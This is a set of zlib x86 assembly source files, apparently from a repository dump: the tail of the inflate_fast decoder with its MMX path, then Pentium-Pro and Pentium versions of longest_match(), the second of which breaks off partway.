* this = dcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl dcode(%esp), %edx /* edx = dcode */
movl (%edx,%eax,4), %eax /* eax = dcode[val + (hold&mask[op])] */
jmp .L_dodist
.align 16,0x90
.L_clip_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* else {
* if (dist > wsize) {
* invalid distance
* }
* from = window;
* nbytes = dist - nbytes;
* if (write == 0) {
* from += wsize - nbytes;
*/
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = len
*
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define len_r %eax
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_wrap_around_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = write, %eax = len
*
* else if (write < nbytes) {
* from += wsize + write - nbytes;
* nbytes -= write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = window;
* nbytes = write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while(--nbytes);
* from = out - dist;
* }
* }
* }
*/
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_contiguous_in_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = write, %eax = len
*
* else {
* from += write - nbytes;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1:
/* regs: %esi = from, %esi = in, %ebp = hold, %bl = bits, %edi = out
* %eax = len
*
* while (len > 0) {
* PUP(out) = PUP(from);
* len--;
* }
* }
* } while (in < last && out < end);
*/
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
#undef len_r
#undef dist_r
#endif /* NO_MMX || RUN_TIME_MMX */
/*** MMX code ***/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
.align 32,0x90
.L_init_mmx:
emms
#undef bits_r
#undef bitslong_r
#define bitslong_r %ebp
#define hold_mm %mm0
movd %ebp, hold_mm
movl %ebx, bitslong_r
#define used_mm %mm1
#define dmask2_mm %mm2
#define lmask2_mm %mm3
#define lmask_mm %mm4
#define dmask_mm %mm5
#define tmp_mm %mm6
movd lmask(%esp), lmask_mm
movq lmask_mm, lmask2_mm
movd dmask(%esp), dmask_mm
movq dmask_mm, dmask2_mm
pxor used_mm, used_mm
movl lcode(%esp), %ebx /* ebx = lcode */
jmp .L_do_loop_mmx
.align 32,0x90
.L_while_test_mmx:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_length_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_length_code_mmx:
pand hold_mm, lmask_mm
movd lmask_mm, %eax
movq lmask2_mm, lmask_mm
movl (%ebx,%eax,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen_mmx:
movzbl %ah, %ecx /* ecx = this.bits */
movd %ecx, used_mm
subl %ecx, bitslong_r /* bits -= this.bits */
testb %al, %al
jnz .L_test_for_length_base_mmx /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test_mmx
.L_test_for_length_base_mmx:
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
testb $16, %al
jz .L_test_for_second_level_length_mmx /* if ((op & 16) == 0) 8% */
andl $15, %eax /* op &= 15 */
jz .L_decode_distance_mmx /* if (!op) */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm
movd hold_mm, %ecx
subl %eax, bitslong_r
andl .L_mask(,%eax,4), %ecx
addl %ecx, len_r /* len += hold & mask[op] */
.L_decode_distance_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_dist_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_dist_code_mmx:
movl dcode(%esp), %ebx /* ebx = dcode */
pand hold_mm, dmask_mm
movd dmask_mm, %eax
movq dmask2_mm, dmask_mm
movl (%ebx,%eax,4), %eax /* eax = dcode[hold & lmask] */
.L_dodist_mmx:
#define dist_r %ebx
movzbl %ah, %ecx /* ecx = this.bits */
movl %eax, dist_r
shrl $16, dist_r /* dist = this.val */
subl %ecx, bitslong_r /* bits -= this.bits */
movd %ecx, used_mm
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist_mmx
andl $15, %eax /* op &= 15 */
jz .L_check_dist_one_mmx
.L_add_bits_to_dist_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm /* save bit length of current op */
movd hold_mm, %ecx /* get the next bits on input stream */
subl %eax, bitslong_r /* bits -= op bits */
andl .L_mask(,%eax,4), %ecx /* ecx = hold & mask[op] */
addl %ecx, dist_r /* dist += hold & mask[op] */
.L_check_window_mmx:
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window_mmx /* if (dist > nbytes) 4.2% */
movl len_r, %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_check_dist_one_mmx:
cmpl $1, dist_r
jne .L_check_window_mmx
cmpl out_r, beg(%esp)
je .L_check_window_mmx
decl out_r
movl len_r, %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_test_for_second_level_length_mmx:
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
addl len_r, %ecx
movl (%ebx,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dolen_mmx
.align 16,0x90
.L_test_for_second_level_dist_mmx:
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
movl dcode(%esp), %eax /* ecx = dcode */
addl dist_r, %ecx
movl (%eax,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dodist_mmx
.align 16,0x90
.L_clip_window_mmx:
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window_mmx /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_wrap_around_window_mmx:
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window_mmx /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_contiguous_in_window_mmx:
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1_mmx:
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
#undef hold_r
#undef bitslong_r
#endif /* USE_MMX || RUN_TIME_MMX */
/*** USE_MMX, NO_MMX, and RUNTIME_MMX from here on ***/
.L_invalid_distance_code:
/* else {
* strm->msg = "invalid distance code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_distance_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_test_for_end_of_block:
/* else if (op & 32) {
* state->mode = TYPE;
* break;
* }
*/
testb $32, %al
jz .L_invalid_literal_length_code /* if ((op & 32) == 0) */
movl $0, %ecx
movl $INFLATE_MODE_TYPE, %edx
jmp .L_update_stream_state
.L_invalid_literal_length_code:
/* else {
* strm->msg = "invalid literal/length code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_literal_length_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_invalid_distance_too_far:
/* strm->msg = "invalid distance too far back";
* state->mode = BAD;
*/
movl in(%esp), in_r /* from_r has in's reg, put in back */
movl $.L_invalid_distance_too_far_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_update_stream_state:
/* set strm->msg = %ecx, strm->state->mode = %edx */
movl strm_sp(%esp), %eax
testl %ecx, %ecx /* if (msg != NULL) */
jz .L_skip_msg
movl %ecx, msg_strm(%eax) /* strm->msg = msg */
.L_skip_msg:
movl state_strm(%eax), %eax /* state = strm->state */
movl %edx, mode_state(%eax) /* state->mode = edx (BAD | TYPE) */
jmp .L_break_loop
.align 32,0x90
.L_break_loop:
/*
* Regs:
*
* bits = %ebp when mmx, and in %ebx when non-mmx
* hold = %hold_mm when mmx, and in %ebp when non-mmx
* in = %esi
* out = %edi
*/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_next_in
#endif /* RUN_TIME_MMX */
movl %ebp, %ebx
.L_update_next_in:
#endif
#define strm_r %eax
#define state_r %edx
/* len = bits >> 3;
* in -= len;
* bits -= len << 3;
* hold &= (1U << bits) - 1;
* state->hold = hold;
* state->bits = bits;
* strm->next_in = in;
* strm->next_out = out;
*/
movl strm_sp(%esp), strm_r
movl %ebx, %ecx
movl state_strm(strm_r), state_r
shrl $3, %ecx
subl %ecx, in_r
shll $3, %ecx
subl %ecx, %ebx
movl out_r, next_out_strm(strm_r)
movl %ebx, bits_state(state_r)
movl %ebx, %ecx
leal buf(%esp), %ebx
cmpl %ebx, last(%esp)
jne .L_buf_not_used /* if buf != last */
subl %ebx, in_r /* in -= buf */
movl next_in_strm(strm_r), %ebx
movl %ebx, last(%esp) /* last = strm->next_in */
addl %ebx, in_r /* in += strm->next_in */
movl avail_in_strm(strm_r), %ebx
subl $11, %ebx
addl %ebx, last(%esp) /* last = &strm->next_in[ avail_in - 11 ] */
.L_buf_not_used:
movl in_r, next_in_strm(strm_r)
movl $1, %ebx
shll %cl, %ebx
decl %ebx
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_hold
#endif /* RUN_TIME_MMX */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ebp
emms
.L_update_hold:
#endif /* USE_MMX || RUN_TIME_MMX */
andl %ebx, %ebp
movl %ebp, hold_state(state_r)
#define last_r %ebx
/* strm->avail_in = in < last ? 11 + (last - in) : 11 - (in - last) */
movl last(%esp), last_r
cmpl in_r, last_r
jbe .L_last_is_smaller /* if (in >= last) */
subl in_r, last_r /* last -= in */
addl $11, last_r /* last += 11 */
movl last_r, avail_in_strm(strm_r)
jmp .L_fixup_out
.L_last_is_smaller:
subl last_r, in_r /* in -= last */
negl in_r /* in = -in */
addl $11, in_r /* in += 11 */
movl in_r, avail_in_strm(strm_r)
#undef last_r
#define end_r %ebx
.L_fixup_out:
/* strm->avail_out = out < end ? 257 + (end - out) : 257 - (out - end)*/
movl end(%esp), end_r
cmpl out_r, end_r
jbe .L_end_is_smaller /* if (out >= end) */
subl out_r, end_r /* end -= out */
addl $257, end_r /* end += 257 */
movl end_r, avail_out_strm(strm_r)
jmp .L_done
.L_end_is_smaller:
subl end_r, out_r /* out -= end */
negl out_r /* out = -out */
addl $257, out_r /* out += 257 */
movl out_r, avail_out_strm(strm_r)
#undef end_r
#undef strm_r
#undef state_r
.L_done:
addl $local_var_size, %esp
popf
popl %ebx
popl %ebp
popl %esi
popl %edi
ret
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast,@function
.size inflate_fast,.-inflate_fast
#endif
|
AIFM-sys/AIFM
| 9,238
|
shenango/apps/parsec/pkgs/libs/zlib/src/contrib/asm686/match.S
|
/* match.s -- Pentium-Pro-optimized version of longest_match()
* Written for zlib 1.1.2
* Copyright (C) 1998 Brian Raiter <breadbox@muppetlabs.com>
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License.
*/
#ifndef NO_UNDERLINE
#define match_init _match_init
#define longest_match _longest_match
#endif
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
#define chainlenwmask 0 /* high word: current chain len */
/* low word: s->wmask */
#define window 4 /* local copy of s->window */
#define windowbestlen 8 /* s->window + bestlen */
#define scanstart 16 /* first two bytes of string */
#define scanend 12 /* last two bytes of string */
#define scanalign 20 /* dword-misalignment of string */
#define nicematch 24 /* a good enough match size */
#define bestlen 28 /* size of best match so far */
#define scan 32 /* ptr to string wanting match */
#define LocalVarsSize (36)
/* saved ebx 36 */
/* saved edi 40 */
/* saved esi 44 */
/* saved ebp 48 */
/* return address 52 */
#define deflatestate 56 /* the function arguments */
#define curmatch 60
/* All the +zlib1222add offsets are due to the addition of fields
* in zlib in the deflate_state structure since the asm code was first written
* (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
* (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
* if you compile with zlib 1.2.2.2 or later , use "zlib1222add equ 8").
*/
#define zlib1222add (8)
#define dsWSize (36+zlib1222add)
#define dsWMask (44+zlib1222add)
#define dsWindow (48+zlib1222add)
#define dsPrev (56+zlib1222add)
#define dsMatchLen (88+zlib1222add)
#define dsPrevMatch (92+zlib1222add)
#define dsStrStart (100+zlib1222add)
#define dsMatchStart (104+zlib1222add)
#define dsLookahead (108+zlib1222add)
#define dsPrevLen (112+zlib1222add)
#define dsMaxChainLen (116+zlib1222add)
#define dsGoodMatch (132+zlib1222add)
#define dsNiceMatch (136+zlib1222add)
.file "match.S"
.globl match_init, longest_match
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
longest_match:
/* Save registers that the compiler may be using, and adjust %esp to */
/* make room for our stack frame. */
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
subl $LocalVarsSize, %esp
/* Retrieve the function arguments. %ecx will hold cur_match */
/* throughout the entire function. %edx will hold the pointer to the */
/* deflate_state structure during the function's setup (before */
/* entering the main loop). */
movl deflatestate(%esp), %edx
movl curmatch(%esp), %ecx
/* uInt wmask = s->w_mask; */
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/* chain_length >>= 2; */
/* } */
movl dsPrevLen(%edx), %eax
movl dsGoodMatch(%edx), %ebx
cmpl %ebx, %eax
movl dsWMask(%edx), %eax
movl dsMaxChainLen(%edx), %ebx
jl LastMatchGood
shrl $2, %ebx
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the wmask */
/* value, which it will always accompany. */
decl %ebx
shll $16, %ebx
orl %eax, %ebx
movl %ebx, chainlenwmask(%esp)
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
movl dsNiceMatch(%edx), %eax
movl dsLookahead(%edx), %ebx
cmpl %eax, %ebx
jl LookaheadLess
movl %eax, %ebx
LookaheadLess: movl %ebx, nicematch(%esp)
/* register Bytef *scan = s->window + s->strstart; */
movl dsWindow(%edx), %esi
movl %esi, window(%esp)
movl dsStrStart(%edx), %ebp
lea (%esi,%ebp), %edi
movl %edi, scan(%esp)
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
movl %edi, %eax
negl %eax
andl $3, %eax
movl %eax, scanalign(%esp)
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/* s->strstart - (IPos)MAX_DIST(s) : NIL; */
movl dsWSize(%edx), %eax
subl $MIN_LOOKAHEAD, %eax
subl %eax, %ebp
jg LimitPositive
xorl %ebp, %ebp
LimitPositive:
/* int best_len = s->prev_length; */
movl dsPrevLen(%edx), %eax
movl %eax, bestlen(%esp)
/* Store the sum of s->window + best_len in %esi locally, and in %esi. */
addl %eax, %esi
movl %esi, windowbestlen(%esp)
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
/* Posf *prev = s->prev; */
movzwl (%edi), %ebx
movl %ebx, scanstart(%esp)
movzwl -1(%edi,%eax), %ebx
movl %ebx, scanend(%esp)
movl dsPrev(%edx), %edi
/* Jump into the main loop. */
movl chainlenwmask(%esp), %edx
jmp LoopEntry
.balign 16
/* do {
* match = s->window + cur_match;
* if (*(ushf*)(match+best_len-1) != scan_end ||
* *(ushf*)match != scan_start) continue;
* [...]
* } while ((cur_match = prev[cur_match & wmask]) > limit
* && --chain_length != 0);
*
* Here is the inner loop of the function. The function will spend the
* majority of its time in this loop, and majority of that time will
* be spent in the first ten instructions.
*
* Within this loop:
* %ebx = scanend
* %ecx = curmatch
* %edx = chainlenwmask - i.e., ((chainlen << 16) | wmask)
* %esi = windowbestlen - i.e., (window + bestlen)
* %edi = prev
* %ebp = limit
*/
LookupLoop:
andl %edx, %ecx
movzwl (%edi,%ecx,2), %ecx
cmpl %ebp, %ecx
jbe LeaveNow
subl $0x00010000, %edx
js LeaveNow
LoopEntry: movzwl -1(%esi,%ecx), %eax
cmpl %ebx, %eax
jnz LookupLoop
movl window(%esp), %eax
movzwl (%eax,%ecx), %eax
cmpl scanstart(%esp), %eax
jnz LookupLoop
/* Store the current value of chainlen. */
movl %edx, chainlenwmask(%esp)
/* Point %edi to the string under scrutiny, and %esi to the string we */
/* are hoping to match it up with. In actuality, %esi and %edi are */
/* both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and %edx is */
/* initialized to -(MAX_MATCH_8 - scanalign). */
movl window(%esp), %esi
movl scan(%esp), %edi
addl %ecx, %esi
movl scanalign(%esp), %eax
movl $(-MAX_MATCH_8), %edx
lea MAX_MATCH_8(%edi,%eax), %edi
lea MAX_MATCH_8(%esi,%eax), %esi
/* Test the strings for equality, 8 bytes at a time. At the end,
* adjust %edx so that it is offset to the exact byte that mismatched.
*
* We already know at this point that the first three bytes of the
* strings match each other, and they can be safely passed over before
* starting the compare loop. So what this code does is skip over 0-3
* bytes, as much as necessary in order to dword-align the %edi
* pointer. (%esi will still be misaligned three times out of four.)
*
* It should be confessed that this loop usually does not represent
* much of the total running time. Replacing it with a more
* straightforward "rep cmpsb" would not drastically degrade
* performance.
*/
LoopCmps:
movl (%esi,%edx), %eax
xorl (%edi,%edx), %eax
jnz LeaveLoopCmps
movl 4(%esi,%edx), %eax
xorl 4(%edi,%edx), %eax
jnz LeaveLoopCmps4
addl $8, %edx
jnz LoopCmps
jmp LenMaximum
LeaveLoopCmps4: addl $4, %edx
LeaveLoopCmps: testl $0x0000FFFF, %eax
jnz LenLower
addl $2, %edx
shrl $16, %eax
LenLower: subb $1, %al
adcl $0, %edx
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
lea (%edi,%edx), %eax
movl scan(%esp), %edi
subl %edi, %eax
cmpl $MAX_MATCH, %eax
jge LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
cmpl %ebx, %eax
jg LongerMatch
movl windowbestlen(%esp), %esi
movl dsPrev(%edx), %edi
movl scanend(%esp), %ebx
movl chainlenwmask(%esp), %edx
jmp LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch: movl nicematch(%esp), %ebx
movl %eax, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
cmpl %ebx, %eax
jge LeaveNow
movl window(%esp), %esi
addl %eax, %esi
movl %esi, windowbestlen(%esp)
movzwl -1(%edi,%eax), %ebx
movl dsPrev(%edx), %edi
movl %ebx, scanend(%esp)
movl chainlenwmask(%esp), %edx
jmp LookupLoop
/* Accept the current string, with the maximum possible length. */
LenMaximum: movl deflatestate(%esp), %edx
movl $MAX_MATCH, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
movl dsLookahead(%edx), %eax
cmpl %eax, %ebx
jg LookaheadRet
movl %ebx, %eax
LookaheadRet:
/* Restore the stack and return from whence we came. */
addl $LocalVarsSize, %esp
popl %ebx
popl %esi
popl %edi
popl %ebp
match_init: ret
|
AIFM-sys/AIFM
| 10,817
|
shenango/apps/parsec/pkgs/libs/zlib/src/contrib/asm586/match.S
|
/* match.s -- Pentium-optimized version of longest_match()
* Written for zlib 1.1.2
* Copyright (C) 1998 Brian Raiter <breadbox@muppetlabs.com>
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License.
*/
#ifndef NO_UNDERLINE
#define match_init _match_init
#define longest_match _longest_match
#endif
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
#define wmask 0 /* local copy of s->wmask */
#define window 4 /* local copy of s->window */
#define windowbestlen 8 /* s->window + bestlen */
#define chainlenscanend 12 /* high word: current chain len */
/* low word: last bytes sought */
#define scanstart 16 /* first two bytes of string */
#define scanalign 20 /* dword-misalignment of string */
#define nicematch 24 /* a good enough match size */
#define bestlen 28 /* size of best match so far */
#define scan 32 /* ptr to string wanting match */
#define LocalVarsSize (36)
/* saved ebx 36 */
/* saved edi 40 */
/* saved esi 44 */
/* saved ebp 48 */
/* return address 52 */
#define deflatestate 56 /* the function arguments */
#define curmatch 60
/* Offsets for fields in the deflate_state structure. These numbers
* are calculated from the definition of deflate_state, with the
* assumption that the compiler will dword-align the fields. (Thus,
* changing the definition of deflate_state could easily cause this
* program to crash horribly, without so much as a warning at
* compile time. Sigh.)
*/
/* All the +zlib1222add offsets are due to the addition of fields
* in zlib in the deflate_state structure since the asm code was first written
* (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
* (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
* if you compile with zlib 1.2.2.2 or later , use "zlib1222add equ 8").
*/
#define zlib1222add (8)
#define dsWSize (36+zlib1222add)
#define dsWMask (44+zlib1222add)
#define dsWindow (48+zlib1222add)
#define dsPrev (56+zlib1222add)
#define dsMatchLen (88+zlib1222add)
#define dsPrevMatch (92+zlib1222add)
#define dsStrStart (100+zlib1222add)
#define dsMatchStart (104+zlib1222add)
#define dsLookahead (108+zlib1222add)
#define dsPrevLen (112+zlib1222add)
#define dsMaxChainLen (116+zlib1222add)
#define dsGoodMatch (132+zlib1222add)
#define dsNiceMatch (136+zlib1222add)
.file "match.S"
.globl match_init, longest_match
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
longest_match:
/* Save registers that the compiler may be using, and adjust %esp to */
/* make room for our stack frame. */
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
subl $LocalVarsSize, %esp
/* Retrieve the function arguments. %ecx will hold cur_match */
/* throughout the entire function. %edx will hold the pointer to the */
/* deflate_state structure during the function's setup (before */
/* entering the main loop). */
movl deflatestate(%esp), %edx
movl curmatch(%esp), %ecx
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
movl dsNiceMatch(%edx), %eax
movl dsLookahead(%edx), %ebx
cmpl %eax, %ebx
jl LookaheadLess
movl %eax, %ebx
LookaheadLess: movl %ebx, nicematch(%esp)
/* register Bytef *scan = s->window + s->strstart; */
movl dsWindow(%edx), %esi
movl %esi, window(%esp)
movl dsStrStart(%edx), %ebp
lea (%esi,%ebp), %edi
movl %edi, scan(%esp)
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
movl %edi, %eax
negl %eax
andl $3, %eax
movl %eax, scanalign(%esp)
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/* s->strstart - (IPos)MAX_DIST(s) : NIL; */
movl dsWSize(%edx), %eax
subl $MIN_LOOKAHEAD, %eax
subl %eax, %ebp
jg LimitPositive
xorl %ebp, %ebp
LimitPositive:
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/* chain_length >>= 2; */
/* } */
movl dsPrevLen(%edx), %eax
movl dsGoodMatch(%edx), %ebx
cmpl %ebx, %eax
movl dsMaxChainLen(%edx), %ebx
jl LastMatchGood
shrl $2, %ebx
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the scanend */
/* scanend value, which it will always accompany. */
decl %ebx
shll $16, %ebx
